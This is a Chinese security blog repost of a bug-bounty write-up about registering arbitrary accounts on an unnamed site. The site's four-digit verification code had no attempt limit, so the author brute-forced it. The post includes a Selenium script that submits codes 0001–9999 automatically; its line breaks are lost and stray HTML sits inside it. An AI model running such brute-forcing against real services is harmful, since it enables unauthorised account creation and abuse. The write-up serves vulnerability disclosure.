某SRC任意账户注册绕过加密

admin 2024年9月29日00:30:23评论7 views字数 979阅读3分15秒阅读模式

0X01 漏洞复现

1、首先来到登录页面,看到了注册

某SRC任意账户注册绕过加密

2、接着点击进入到注册这里

某SRC任意账户注册绕过加密

3、点击获取验证码发现是四位数的,提交的时候验证码也是加密的

某SRC任意账户注册绕过加密

4、接下来测试一下有没有次数限制,先跑100次,发现它不会检测你提交了多少次,只要你输入对了,但是验证码RSA加密了反编译不出来咋整?

某SRC任意账户注册绕过加密

5、别慌,我们还可以手动去提交,从0001-9999依次去提交就完事了

某SRC任意账户注册绕过加密

6、太累了,还是直接写python脚本去跑吧

# -*- coding:utf-8 -*-from selenium.webdriver import Chromefrom selenium.webdriver.common.keys import Keysfrom selenium.webdriver.common.by import Byimport timeurl = "http://xxx.com/hkc/register"web = Chrome()web.get(url)a = input("&gt;&gt;")codeby = web.find_element(By.XPATH, '//*[<span class="label label-primary">@id=</span>"app"]/div/div[2]/form/div[5]/div/div[1]/div/div/input')f = open('./four_code.txt', mode='r', encoding='utf-8')"""1. 使用selenium模块,并下载谷歌浏览器驱动放置在python跟路径2. 填写其它必要注册信息,获取验证码,接下来的交给脚本(若提交按钮呈现灰色,请先随便输入验证码,点击一次提交按钮,然后清楚你输入的验证码)3. 回到脚本,随便输入一个字符,开始自动爆破验证码"""for code in f.readlines():    codeby.send_keys(code.strip())    web.find_element(By.XPATH, '//*[<span class="label label-primary">@id=</span>"app"]/div/div[2]/form/div[7]/div/div/button').click()    codeby.clear()

某SRC任意账户注册绕过加密

某SRC任意账户注册绕过加密

成功拿下漏洞

原文始发于微信公众号(渗透安全HackTwo):某SRC任意账户注册绕过加密

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月29日00:30:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某SRC任意账户注册绕过加密https://cn-sec.com/archives/1977031.html

发表评论

匿名网友 填写信息